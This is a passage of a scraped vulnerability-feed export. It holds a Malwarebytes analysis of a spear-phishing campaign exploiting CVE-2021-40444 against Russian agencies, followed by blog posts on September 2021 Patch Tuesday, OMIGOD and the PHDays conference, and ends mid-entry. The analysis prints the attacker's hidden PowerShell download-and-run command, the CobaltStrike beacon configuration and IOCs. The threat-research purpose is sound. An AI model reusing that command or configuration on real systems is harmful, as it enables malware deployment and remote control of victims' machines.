\u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in Russian language and pretend to be from Russia's "Ministry of Information Technologies and Communications of the Russian Federation" and "MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS". One of them is a letter about limitation of access to Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe html file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim's machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses "_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_" (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with "Madagascar" which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the "Initialize-Engine" function. This function collects the victim's info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by "|" character and at the end it add the group name and API config value. The created string is being send to the server using _Send-WebInit_ function. This function adds "INIT%%%" string to the created string and base64 encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the "Invoke-Engine" function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends "GETTASK%%" in Base64 format to its server to show it is ready to get tasks and execute them. The "IC" command is used to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be send to the server using "PUTTASK%%" command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain: ** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit: ** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc: \n**c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0** \nPowerShell Rat C2:** \nswordoke[.]com** \n** \n \n\n\n \n\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T16:35:06", "description": "The September 2021 Patch Tuesday could be remembered as the _final_ patching attempt in the PrintNightmare\u2026 nightmare. The ease with which the vulnerabilities [shrugged off the August patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) doesn\u2019t look to get a rerun. So far we haven\u2019t seen any indications that this patch is so easy to circumvent.\n\nThe total count of fixes for this Patch Tuesday tallies up to 86, including 26 for Microsoft Edge alone. Only a few of these vulnerabilities are listed as zero-days and two of them are "old friends". There is a third, less-likely-to-be-exploited one, and then we get to introduce a whole new set of vulnerabilities nicknamed OMIGOD, for reasons that will become obvious.\n\nAzure was the subject of five CVE\u2019s, one of them listed as critical. The four that affect the Open Management Infrastructure (OMI) were found by researchers, grouped together and received the nickname OMIGOD.\n\n### PrintNightmare\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a malicious printer driver to a vulnerable machine, and could use their new-found superpowers to install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe problem was made worse by significant [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) about whether PrintNightmare was a known, patched problem or an entirely new problem, and by repeated, at best partially-successful, attempts to patch it.\n\nThis month, Microsoft patched the remaining Print Spooler vulnerabilities under [CVE-2021-36958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36958>). Fingers crossed.\n\n### MSHTML\n\nThis zero-day vulnerability that felt like a ghost from the past (it involved ActiveX, remember that?) was only [found last week](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>), but has attracted significant attention. It was listed as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), a Remote Code Execution (RCE) vulnerability in Microsoft MSHTML. \n\nThreat actors were sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker was able to follow step-by-step instructions in order to launch their own attacks. Microsoft published mitigation instructions that disabled the installation of new ActiveX controls, but this turned out to be easy to work around for attackers.\n\nGiven the short window of opportunity, there was some doubt about whether a fix would be included in this Patch Tuesday, but it looks like Microsoft managed to pull it off.\n\n### DNS elevation of privilege vulnerability\n\nThis vulnerability was listed as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>) and affects systems running Windows Server 2008 R2 SP1, SP2 and Windows 7 SP1. It exists due to an application that does not properly impose security restrictions in Windows DNS. The vulnerability is listed as a zero-day because it has been publicly disclosed, not because it is actively being exploited.\n\nMicrosoft says that exploitation is \u201cless likely\u201d, perhaps because it requires initial authentication and can only be exploited locally. If these conditions are met this bug can be used to accomplish elevation of privilege (EoP). \n\n### OMIGOD\n\nOMIGOD is the name for a set of four vulnerabilities in the Open Management Infrastructure (OMI) that you will find embedded in many popular Azure services. The CVEs are:\n\n * [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>) OMI RCE Vulnerability with a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n * [CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) Open Management Infrastructure Elevation of Privilege Vulnerability\n\nThe [researchers](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) that discovered the vulnerabilities consider OMIGOD to be a result of the supply-chain risks that come with using open-source code:\n\n> Wiz\u2019s research team recently discovered a series of alarming vulnerabilities that highlight the supply chain risk of open source code, particularly for customers of cloud computing services.\n\nOMI runs as root (the highest privilege level) and is activated within Azure when users enable certain services, like distributed logging, or other management tools and services. It's likely that many users aren't even aware they have it running.\n\nThe RCE vulnerability (CVE-2021-38647) can be exploited in situations where the OMI ports are accessible to the Internet to allow for remote management. In this configuration, any user can communicate with it using a UNIX socket or via an HTTP API, and any user can abuse it to remotely execute code or escalate privileges.\n\nA coding mistake means that any incoming request to the service _without_ an authorization header has its privileges default to uid=0, gid=0, which is root. \n \nOMIGOD, right?\n\nThe researchers report that the flaw can only be used to remotely takeover a target when OMI exposes the HTTPS management port externally. This is the default configuration when installed standalone and in Azure Configuration Management or System Center Operations Manager (SCOM). Other Azure services (such as Log Analytics) do not expose this port, so in those cases the scope is limited to local privilege escalation.\n\nThey advise all Azure customers to connect to their Azure VMs and run the commands below in their terminal to ensure OMI is updated to the latest version:\n\n * For Debian systems (e.g., Ubuntu): `dpkg -l omi`\n * For Redhat based system (e.g., Fedora, CentOS, RHEL): `rpm -qa omi`\n\nIf OMI isn\u2019t installed, the commands won't return any results, and your machine isn\u2019t vulnerable. Version 1.6.8.1 is the patched version. All earlier versions need to be patched.\n\n## Update September 17, 2021\n\nAfter a proof-of-concept exploit was published on code hosting website GitHub, attackers we re noticed to be looking for Linux servers running on Microsoft\u2019s Azure cloud infrastructure. These systems are vulnerable to the security flaw called OMIGOD.\n\nAccording to reports from security researchers the attackers use the OMIGOD exploit, to deploy malware that ensnares the hacked server into cryptomining or DDoS botnets.\n\nThe post [[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-15T13:19:48", "type": "malwarebytes", "title": "[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36958", "CVE-2021-36968", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444"], "modified": "2021-09-15T13:19:48", "id": "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-06-11T01:56:16", "description": "Hello everyone! In this episode, I want to talk about the Positive Hack Days 11 conference, which took place on May 18 and 19 in Moscow. As usual, I want to express my personal opinion about this event.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239091>\n\nAs I did last year, I want to start talking about this conference with a few words about the sanctions. US sanctions against Positive Technologies, the organizers of Positive Hack Days, were introduced a year ago. At that time it seemed very serious and extraordinary. But today, when our country has become the most sanctioned country in the world, those sanctions against Positive Technologies seem very ordinary and unimportant. In fact, it even seems to benefit the company somehow.\n\n## Positive Technologies\n\nAt the end of last year, Positive Technologies became a public company with a strong focus on the domestic market and the market of friendly countries. The financial results are very impressive. The company's marketing is better than ever, especially everything related to video production. And, of course, their products are in even greater demand, because Western vendors have left the Russian market.\n\n## PHDays 11\n\nAs for the event, it is still the most important information security conference in Russia. In fact it was the most visited PHDays. 10,000+ guests at the Moscow World Trade Center, 130,000+ viewers of online broadcasts. I was only on the second day, when it was not as crowded as the first day of the conference. The atmosphere at the event was not the same as at a regular conference. It was more like a nightclub. Subdued lights, music, a lot of screens and all sorts of lighting effects. Very unusual.\n\n## The Standoff\n\nThe main show of the conference is the CTF competition of hackers and blue teams, The Standoff. The toy city, which displays the infrastructure of the virtual state of F, has become really huge. Entire sectors of the economy were represented there: metallurgy, electric power industry, oil industry, transport, banking system, housing management. etc. All this is interconnected. An attack on one object can cause a butterfly effect that affects the entire state. Very impressive!\n\n## Talks\n\nThe PHDays 11 program included about 100 talks, which were attended by more than 250 speakers. One of them was me. It makes no sense to list all the talks, but logically I would highlight out 3 of them.\n\n 1. Sergey Golovanov "[01111111day](<https://www.youtube.com/watch?v=p6-4Ky7uy_E>)**"** ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). He spoke about the attacks on Russian organisations after February 23rd. To summarize all that has been said, the number of attacks has become much greater. The source of the attacks is clear. Most of the attacks were simple and it was hacktivism, but they get more complicated with time. The main attacks are DDoS and penetration into the infrastructure for further data theft and destruction. Phishing is one of the commonly used penetration channels.\n 2. Alexander Goncharov "[CVE-2021-40444: why it is important](<https://www.youtube.com/watch?v=knCqmDoELjM>)" ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). Microsoft MSHTML Remote Code Execution Vulnerability. This is not the newest vulnerability, one of many. But in fact, it continues to be actively exploited, and mainly through phishing. Why? Since users are susceptible to phishing, hosts are not updated and hardened (disabling ActiveX, preventing office applications from creating child processes). And all this, of course, needs to be implemented in organizations. But one of the interesting questions is: can we now trust vendor updates that fix vulnerabilities? Alexander replied that we can, because enterprise IT vendors like Microsoft will not disable anything in terms of functionality. Simply because it will be a blow to their reputation.\n 3. And my presentation was just about this topic of trust. "[The new reality of information security and vulnerability management](<https://www.youtube.com/watch?v=phL8ClOLpqo>)" ([rus](<https://www.youtube.com/watch?v=XbAxuikX_eE>)). You can watch the video in my YouTube channel in Russian and with simultaneous translation. Simultaneous translation is difficult to do, especially in the fast track, so I will also make an extended English version of this report for [VMconf 22](<https://vmconf.pw/>). By the way, you can also submit a video about Vulnerability Management there if you want. So what was my report about. The new reality of information security (TNRoIS) began in February 2022. In this new reality, global vendors and open source software are less trusted than before. What was only recently viewed as a competitive product or service, has become a means of pressure, a Trojan horse, a threat to corporate information security. The new reality sets new requirements for key corporate processes, including the choice of IT products and information security solutions, security analysis, and update management. The forced de-Westernization of the IT infrastructure of Russian companies will not happen overnight. This is a long and difficult process. For example, is it true that by 2025 there will be no Microsoft software in Russian companies and everything will work on Russian Linux distributions? Now it seems too ambitious. Most likely we will see some kind of hybrid mode with a complex process of supporting unstable Western IT solutions and a simplified process for stable, mainly Russian IT solutions. Of course, it will be much more difficult than it was before, but there is a challenge in these difficulties. The problems faced by the Russian organizations in extreme form are relevant to much of the world, which means that certain terminology, approaches, and solutions can be successfully exported. \n\n## What could be better on PHDays 11?\n\nWell, there were few speeches about Vulnerability Management. For my taste. There was my presentation, there were a couple of speeches about specific vulnerabilities and rootkits, there was a [basic interview about Vulnerability Management](<https://www.youtube.com/watch?v=Scod5yQiKtM>) ([rus](<https://www.youtube.com/watch?v=Cgbq1qG_CZQ>)) and an interview about [MaxPatrol O2](<https://www.youtube.com/watch?v=hCSK0wi-KRU>) ([rus](<https://www.youtube.com/watch?v=SAt_gedhXw8>)). But it was very fragmented. It seems to me that the main conference of the leading Russian Vulnerability Management vendor should have a session or maybe even a track about Vulnerability Management. At least 2-3 hours. It would be nice to have a program that would resemble [Qualys QSC](<https://avleonov.com/2021/12/06/qsc21-vmdr-training-and-exam/>). After all, they talk about VM all day, why is it not possible on PHDays? Ideally, if there would be 80% about interesting practical cases and processes and 20% about how to solve them using Positive Technologies products (as a demonstration). That would be really cool and that would be right.\n\nIt may sound silly, but I missed bag chairs and sofas. There were far fewer of them. In past years, I liked to sit on them, relax and talk with colleagues. This time all the conversations were on the feet and it was not very convenient.\n\nIt seems like PHDays needs more space. There were practically no seats left in the halls. The fast track where I performed was in a tiny hall, which is not so easy to find. The organizers said that it did not happen on purpose. The schedule was changed at the last moment and the Fast Track had to be moved from a more convenient place. It's a bit sad, but the fact that full-length reports are a priority is right. And in our post-COVID time, the most important thing is video broadcasting, and it was at a very high level. My presentation went well, the audience was friendly, there were some very interesting questions.\n\nMany thanks to the organizers and participants. Until the next PHDays!", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T00:46:58", "type": "avleonov", "title": "PHDays 11: towards the Independence Era", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-11T00:46:58", "id": "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "href": "https://avleonov.com/2022/06/11/phdays-11-towards-the-independence-era/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. "This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network."\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn't released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": "AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-01-13T10:53:19", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update 